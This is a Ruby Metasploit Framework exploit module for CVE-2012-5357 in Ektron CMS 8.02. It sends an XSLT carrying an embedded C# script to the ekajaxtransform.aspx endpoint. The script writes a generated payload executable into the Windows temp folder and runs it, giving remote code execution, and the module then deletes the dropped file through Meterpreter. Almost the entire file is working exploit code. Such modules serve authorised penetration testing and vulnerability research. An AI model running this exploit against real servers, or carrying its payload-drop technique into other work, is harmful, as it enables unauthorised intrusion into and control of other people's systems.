## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' require 'msf/core/exploit/file_dropper' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::EXE include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'Ektron 8.02 XSLT Transform Remote Code Execution', 'Description' => %q{ This module exploits a vulnerability in Ektron CMS 8.02 (before SP5). The vulnerability exists due to the insecure usage of XslCompiledTransform, using a XSLT controlled by the user. The module has been tested successfully on Ektron CMS 8.02 over Windows 2003 SP2, which allows to execute arbitrary code with NETWORK SERVICE privileges. }, 'Author' => [ 'Unknown', # Vulnerability discovery, maybe Richard Lundeen from http://webstersprodigy.net/ ? 'juan vazquez' # Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2012-5357'], [ 'URL', 'http://webstersprodigy.net/2012/10/25/cve-2012-5357cve-1012-5358-cool-ektron-xslt-rce-bugs/' ], [ 'URL', 'http://technet.microsoft.com/en-us/security/msvr/msvr12-016' ] ], 'Payload' => { 'Space' => 2048, 'StackAdjustment' => -3500 }, 'Platform' => 'win', 'Privileged' => true, 'Targets' => [ ['Windows 2003 SP2 / Ektron CMS400 8.02', { }], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Oct 16 2012' )) register_options( [ OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the VBS payload request', 60]), OptString.new('TARGETURI', [true, 'The URI path of the Ektron CMS', '/cms400min/']) ], self.class ) end def check fingerprint = rand_text_alpha(5 + rand(5)) xslt_data = <<-XSLT <?xml version='1.0'?> <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:user="http://mycompany.com/mynamespace"> <msxsl:script language="C#" implements-prefix="user"> <![CDATA[ public string xml() { return "#{fingerprint}"; } ]]> </msxsl:script> <xsl:template match="/"> <xsl:value-of select="user:xml()"/> </xsl:template> </xsl:stylesheet> XSLT res = send_request_cgi( { 'uri' => "#{uri_path}WorkArea/ContentDesigner/ekajaxtransform.aspx", 'version' => '1.1', 'method' => 'POST', 'ctype' => "application/x-www-form-urlencoded; charset=UTF-8", 'headers' => { "Referer" => build_referer }, 'vars_post' => { "xml" => rand_text_alpha(5 + rand(5)), "xslt" => xslt_data } }) if res and res.code == 200 and res.body =~ /#{fingerprint}/ and res.body !~ /Error/ return Exploit::CheckCode::Vulnerable end return Exploit::CheckCode::Safe end def on_new_session(session) if session.type == "meterpreter" session.core.use("stdapi") unless session.ext.aliases.include?("stdapi") end @dropped_files.delete_if do |file| win_file = file.gsub("/", "\\\\") if session.type == "meterpreter" begin windir = session.fs.file.expand_path("%WINDIR%") win_file = "#{windir}\\Temp\\#{win_file}" # Meterpreter should do this automatically as part of # fs.file.rm(). Until that has been implemented, remove the # read-only flag with a command. session.shell_command_token(%Q|attrib.exe -r "#{win_file}"|) session.fs.file.rm(win_file) print_good("Deleted #{file}") true rescue ::Rex::Post::Meterpreter::RequestError print_error("Failed to delete #{win_file}") false end end end end def uri_path uri_path = target_uri.path uri_path << "/" if uri_path[-1, 1] != "/" uri_path end def build_referer if datastore['SSL'] schema = "https://" else schema = "http://" end referer = schema referer << rhost referer << ":#{rport}" referer << uri_path referer end def exploit print_status("Generating the EXE Payload and the XSLT...") exe_data = generate_payload_exe exe_string = Rex::Text.to_hex(exe_data) exename = rand_text_alpha(5 + rand(5)) fingerprint = rand_text_alpha(5 + rand(5)) xslt_data = <<-XSLT <?xml version='1.0'?> <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:user="http://mycompany.com/mynamespace"> <msxsl:script language="C#" implements-prefix="user"> <![CDATA[ public string xml() { char[] charData = "#{exe_string}".ToCharArray(); string fileName = @"C:\\windows\\temp\\#{exename}.txt"; System.IO.FileStream fs = new System.IO.FileStream(fileName, System.IO.FileMode.Create); System.IO.BinaryWriter bw = new System.IO.BinaryWriter(fs); for (int i = 0; i < charData.Length; i++) { bw.Write( (byte) charData[i]); } bw.Close(); fs.Close(); System.Diagnostics.Process p = new System.Diagnostics.Process(); p.StartInfo.UseShellExecute = false; p.StartInfo.RedirectStandardOutput = true; p.StartInfo.FileName = @"C:\\windows\\temp\\#{exename}.txt"; p.Start(); return "#{fingerprint}"; } ]]> </msxsl:script> <xsl:template match="/"> <xsl:value-of select="user:xml()"/> </xsl:template> </xsl:stylesheet> XSLT print_status("Trying to run the xslt transformation...") res = send_request_cgi( { 'uri' => "#{uri_path}WorkArea/ContentDesigner/ekajaxtransform.aspx", 'version' => '1.1', 'method' => 'POST', 'ctype' => "application/x-www-form-urlencoded; charset=UTF-8", 'headers' => { "Referer" => build_referer }, 'vars_post' => { "xml" => rand_text_alpha(5 + rand(5)), "xslt" => xslt_data } }) if res and res.code == 200 and res.body =~ /#{fingerprint}/ and res.body !~ /Error/ print_good("Exploitation was successful") register_file_for_cleanup("#{exename}.txt") else fail_with(Exploit::Failure::Unknown, "There was an unexpected response to the xslt transformation request") end end end